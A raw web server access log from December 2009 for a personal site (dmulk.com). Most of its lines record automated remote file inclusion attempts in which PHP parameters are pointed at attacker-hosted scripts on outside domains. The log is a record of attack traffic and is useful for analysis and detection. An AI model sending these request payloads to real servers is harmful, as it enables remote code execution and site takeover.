67.19.51.194 - - [13/Dec/2009:08:00:01 -0800] "GET /logs/access_091005.log//?_SERVER[DOCUMENT_ROOT]=http://do-16.ru/loads/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:08:00:01 -0800] "GET /logs/access_090326.log//?_SERVER[DOCUMENT_ROOT]=http://honda1.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:08:00:01 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://honda1.fileave.com/zfxid1.txt? HTTP/1.1" 200 14937 "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:08:00:02 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://honda1.fileave.com/zfxid1.txt? HTTP/1.1" 200 130080 "-" "Mozilla/5.0" "www.dmulk.com"
65.55.104.23 - - [13/Dec/2009:08:02:11 -0800] "GET /blog/index.php/2008/08/28/occ-american-hondas-part-1/?show=gallery HTTP/1.1" 200 19917 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 1.1.4325; .NET CLR 2.0.40607; .NET CLR 3.0.30729; .NET CLR 3.5.30729)" "dmulk.com"
65.55.104.23 - - [13/Dec/2009:08:02:12 -0800] "GET /blog/wp-content/themes/defaultwide/defaultwide/style.css HTTP/1.1" 200 10083 "http://dmulk.com/blog/2008/08/28/occ-american-hondas-part-1/?show=gallery" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 1.1.4325; .NET CLR 2.0.40607; .NET CLR 3.0.30729; .NET CLR 3.5.30729)" "dmulk.com"
65.55.104.23 - - [13/Dec/2009:08:02:12 -0800] "GET /blog/wp-content/plugins/nextgen-gallery/css/nggallery.css?ver=1.0.0 HTTP/1.1" 200 6637 "http://dmulk.com/blog/2008/08/28/occ-american-hondas-part-1/?show=gallery" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 1.1.4325; .NET CLR 2.0.40607; .NET CLR 3.0.30729; .NET CLR 3.5.30729)" "dmulk.com"
65.55.104.23 - - [13/Dec/2009:08:02:13 -0800] "GET /blog/wp-includes/js/thickbox/thickbox.css?ver=20090514 HTTP/1.1" 200 3864 "http://dmulk.com/blog/2008/08/28/occ-american-hondas-part-1/?show=gallery" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 1.1.4325; .NET CLR 2.0.40607; .NET CLR 3.0.30729; .NET CLR 3.5.30729)" "dmulk.com"
65.55.104.23 - - [13/Dec/2009:08:02:13 -0800] "GET /blog/wp-includes/js/jquery/jquery.js?ver=1.3.2 HTTP/1.1" 200 57276 "http://dmulk.com/blog/2008/08/28/occ-american-hondas-part-1/?show=gallery" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 1.1.4325; .NET CLR 2.0.40607; .NET CLR 3.0.30729; .NET CLR 3.5.30729)" "dmulk.com"
65.55.104.23 - - [13/Dec/2009:08:02:15 -0800] "GET /blog/wp-includes/js/swfobject.js?ver=2.1 HTTP/1.0" 200 9759 "http://dmulk.com/blog/2008/08/28/occ-american-hondas-part-1/?show=gallery" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 1.1.4325; .NET CLR 2.0.40607; .NET CLR 3.0.30729; .NET CLR 3.5.30729)" "dmulk.com"
64.34.111.74 - - [13/Dec/2009:08:02:17 -0800] "GET /logs/access_080708.log//?_SERVER[DOCUMENT_ROOT]=http://honda1.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.55.104.23 - - [13/Dec/2009:08:02:21 -0800] "GET /blog/wp-includes/js/thickbox/thickbox.js?ver=3.1-20090123 HTTP/1.1" 200 12100 "http://dmulk.com/blog/2008/08/28/occ-american-hondas-part-1/?show=gallery" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 1.1.4325; .NET CLR 2.0.40607; .NET CLR 3.0.30729; .NET CLR 3.5.30729)" "dmulk.com"
125.245.165.135 - - [13/Dec/2009:08:02:37 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.infocleaners.com/images/title/idosyris.gif???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.dmulk.com"
125.245.165.135 - - [13/Dec/2009:08:02:37 -0800] "GET /logs/access_081202.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.infocleaners.com/images/title/idosyris.gif???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.dmulk.com"
125.245.165.135 - - [13/Dec/2009:08:02:37 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.infocleaners.com/images/title/idosyris.gif???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.dmulk.com"
125.245.165.135 - - [13/Dec/2009:08:02:40 -0800] "GET /logs/access_081125.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.infocleaners.com/images/title/idosyris.gif???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.dmulk.com"
125.245.165.135 - - [13/Dec/2009:08:02:42 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.infocleaners.com/images/title/idosyris.gif???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.dmulk.com"
125.245.165.135 - - [13/Dec/2009:08:02:42 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.infocleaners.com/images/title/idosyris.gif???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.dmulk.com"
125.245.165.135 - - [13/Dec/2009:08:02:43 -0800] "GET /logs/access_081202.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.infocleaners.com/images/title/idosyris.gif???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:08:02:47 -0800] "GET /logs/access_080708.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://honda1.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.245.165.135 - - [13/Dec/2009:08:02:50 -0800] "GET /logs/access_090810.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.infocleaners.com/images/title/idosyris.gif???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.dmulk.com"
66.11.117.195 - - [13/Dec/2009:08:03:43 -0800] "GET /logs/access_080824.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.11.117.195 - - [13/Dec/2009:08:03:43 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.11.117.195 - - [13/Dec/2009:08:03:43 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 200 14880 "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:08:03:45 -0800] "GET /logs/access_071221.log%20%20/protection.php?siteurl=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.11.117.195 - - [13/Dec/2009:08:03:53 -0800] "GET /logs/access_081023.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:08:03:55 -0800] "GET /logs/access_080204.log%20%20/protection.php?siteurl=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.234.21.178 - - [13/Dec/2009:08:05:38 -0800] "GET /logs/access_091203.log//skin/zero_vote/ask_password.php?dir=http://www.dong69.co.kr//xe/common/den/pinkid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.234.21.178 - - [13/Dec/2009:08:05:38 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://www.dong69.co.kr//xe/common/den/pinkid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.234.21.178 - - [13/Dec/2009:08:05:38 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.dong69.co.kr//xe/common/den/pinkid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.234.21.178 - - [13/Dec/2009:08:06:02 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://www.dong69.co.kr//xe/common/den/pinkid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.234.21.178 - - [13/Dec/2009:08:06:02 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.dong69.co.kr//xe/common/den/pinkid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.234.21.178 - - [13/Dec/2009:08:06:02 -0800] "GET /logs/access_080330.log//skin/zero_vote/ask_password.php?dir=http://www.dong69.co.kr//xe/common/den/pinkid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.100.181.217 - - [13/Dec/2009:08:06:11 -0800] "GET /logs/access_081010.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.100.181.217 - - [13/Dec/2009:08:06:11 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.100.181.217 - - [13/Dec/2009:08:06:11 -0800] "GET /logs/access_081110.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.100.181.217 - - [13/Dec/2009:08:06:12 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 200 14880 "-" "Mozilla/5.0" "www.dmulk.com"
66.11.117.195 - - [13/Dec/2009:08:07:28 -0800] "GET /logs/access_081023.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.11.117.195 - - [13/Dec/2009:08:07:28 -0800] "GET /logs/access_080824.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.100.181.217 - - [13/Dec/2009:08:07:30 -0800] "GET /logs/access_080824.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.100.181.217 - - [13/Dec/2009:08:07:30 -0800] "GET /logs/access_081023.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.234.21.178 - - [13/Dec/2009:08:07:33 -0800] "GET /logs/access_091203.log//skin/zero_vote/ask_password.php?dir=http://www.dong69.co.kr//xe/common/den/pinkid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.33.77.13 - - [13/Dec/2009:08:09:00 -0800] "GET /logs/access_091013.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.seorakhoney.com/shop/mail/one.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.33.77.13 - - [13/Dec/2009:08:09:00 -0800] "GET /logs/access_091124.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.seorakhoney.com/shop/mail/one.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.245.165.135 - - [13/Dec/2009:08:09:43 -0800] "GET /logs/access_081202.log%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.infocleaners.com/images/title/idosyris.gif???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.dmulk.com"
79.136.232.126 - - [13/Dec/2009:08:10:42 -0800] "GET /docebo/doceboLms//class/class.dashboard_lms.php?where_framework=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.136.232.126 - - [13/Dec/2009:08:10:42 -0800] "GET /logs//docebo/doceboLms//class/class.dashboard_lms.php?where_framework=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.136.232.126 - - [13/Dec/2009:08:10:42 -0800] "GET /logs/access_080211.log%20%20//docebo/doceboLms//class/class.dashboard_lms.php?where_framework=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.136.232.126 - - [13/Dec/2009:08:10:54 -0800] "GET /docebo/doceboLms//class/class.dashboard_lms.php?where_framework=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.136.232.126 - - [13/Dec/2009:08:10:54 -0800] "GET /logs//docebo/doceboLms//class/class.dashboard_lms.php?where_framework=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.136.232.126 - - [13/Dec/2009:08:11:01 -0800] "GET /logs/access_080211.log%20%20//docebo/doceboLms//class/class.dashboard_lms.php?where_framework=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.245.165.135 - - [13/Dec/2009:08:11:28 -0800] "GET /logs/access_081202.log%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.infocleaners.com/images/title/idosyris.gif???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.dmulk.com"
81.52.143.37 - - [13/Dec/2009:08:12:04 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)" "www.dmulk.com"
81.52.143.37 - - [13/Dec/2009:08:12:13 -0800] "GET /logs/access_080508.log HTTP/1.1" 200 2031616 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)" "www.dmulk.com"
79.136.232.126 - - [13/Dec/2009:08:12:34 -0800] "GET /logs/access_080701.log%20%20//docebo/doceboLms//class/class.dashboard_lms.php?where_framework=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.171.225.234 - - [13/Dec/2009:08:14:03 -0800] "GET /logs/access_090418.log%20%20//bbs//skin/zero_vote/setup.php?dir=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.136.232.126 - - [13/Dec/2009:08:14:15 -0800] "GET /logs/access_080211.log//docebo/doceboLms//class/class.dashboard_lms.php?where_framework=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.136.232.126 - - [13/Dec/2009:08:14:24 -0800] "GET /logs/access_080701.log%20%20//docebo/doceboLms//class/class.dashboard_lms.php?where_framework=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.136.232.126 - - [13/Dec/2009:08:14:31 -0800] "GET /logs/access_080701.log//docebo/doceboLms//class/class.dashboard_lms.php?where_framework=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.199.239.79 - - [13/Dec/2009:08:14:38 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; GoogleToolbar 6.3.1106.427; Windows XP 5.1; MSIE 7.0.5730.13)" "www.dmulk.com"
72.199.239.79 - - [13/Dec/2009:08:14:38 -0800] "GET /megumi/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; GoogleToolbar 6.3.1106.427; Windows XP 5.1; MSIE 7.0.5730.13)" "www.dmulk.com"
66.11.117.195 - - [13/Dec/2009:08:16:42 -0800] "GET /logs/access_091023.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.11.117.195 - - [13/Dec/2009:08:16:42 -0800] "GET /logs/access_081129.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.171.225.234 - - [13/Dec/2009:08:17:19 -0800] "GET /logs/access_091203.log%20%20//bbs//skin/zero_vote/setup.php?dir=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:08:17:27 -0800] "GET /logs/access_090516.log%20%20/NuclearBB/tasks/send_queued_emails.php?root_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:08:17:28 -0800] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:08:17:28 -0800] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:08:17:35 -0800] "GET /logs/access_080410.log%20%20/NuclearBB/tasks/send_queued_emails.php?root_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:08:17:35 -0800] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:08:17:36 -0800] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:08:17:36 -0800] "GET /logs/access_090516.log%20%20/NuclearBB/tasks/send_queued_emails.php?root_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:08:17:39 -0800] "GET /logs/access_080410.log%20%20/NuclearBB/tasks/send_queued_emails.php?root_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:08:19:47 -0800] "GET /logs/access_090516.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:08:19:47 -0800] "GET /logs/access_080410.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:08:20:18 -0800] "GET /administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:08:20:18 -0800] "GET /administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:08:20:18 -0800] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:08:20:18 -0800] "GET /logs/access_090918.log%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:08:20:18 -0800] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:08:20:19 -0800] "GET /logs/access_090918.log%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:08:20:27 -0800] "GET /logs/access_081010.log%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:08:20:28 -0800] "GET /logs/access_081010.log%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:08:20:36 -0800] "GET /logs/access_080410.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:08:20:36 -0800] "GET /logs/access_090516.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
193.252.118.176 - - [13/Dec/2009:08:20:56 -0800] "GET /logs/access_080625.log HTTP/1.1" 200 1769472 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:08:21:22 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:08:21:22 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:08:21:22 -0800] "GET /logs/access_090712.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
131.191.65.204 - - [13/Dec/2009:08:21:27 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture070-1024.jpg HTTP/1.1" 200 78258 "http://www.advrider.com/forums/showthread.php?t=329337&page=532" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)" "dmulk.com"
82.195.252.206 - - [13/Dec/2009:08:22:03 -0800] "GET /logs/access_090412.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.136.232.126 - - [13/Dec/2009:08:23:21 -0800] "GET /logs/access_080211.log//docebo/doceboLms//class/class.dashboard_lms.php?where_framework=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.136.232.126 - - [13/Dec/2009:08:23:40 -0800] "GET /logs/access_080701.log//docebo/doceboLms//class/class.dashboard_lms.php?where_framework=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:08:24:00 -0800] "GET /logs/access_090707.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:08:24:01 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 200 130082 "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:08:24:04 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 200 14970 "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:08:24:47 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 200 130082 "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:08:24:47 -0800] "GET /logs/access_090710.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:08:24:47 -0800] "GET /logs/access_091004.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [13/Dec/2009:08:24:48 -0800] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.8.6; http://dmulk.com/blog" "dmulk.com"
119.202.76.160 - - [13/Dec/2009:08:24:48 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 200 14945 "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:08:24:59 -0800] "GET /logs/access_090711.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:08:25:02 -0800] "GET /logs/access_081207.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:08:25:30 -0800] "GET /logs/access_081110.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:08:25:47 -0800] "GET /logs/access_090707.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:08:25:48 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 200 14969 "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:08:25:48 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 200 130082 "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:08:25:49 -0800] "GET /logs/access_090327.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:08:25:55 -0800] "GET /logs/access_090322.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
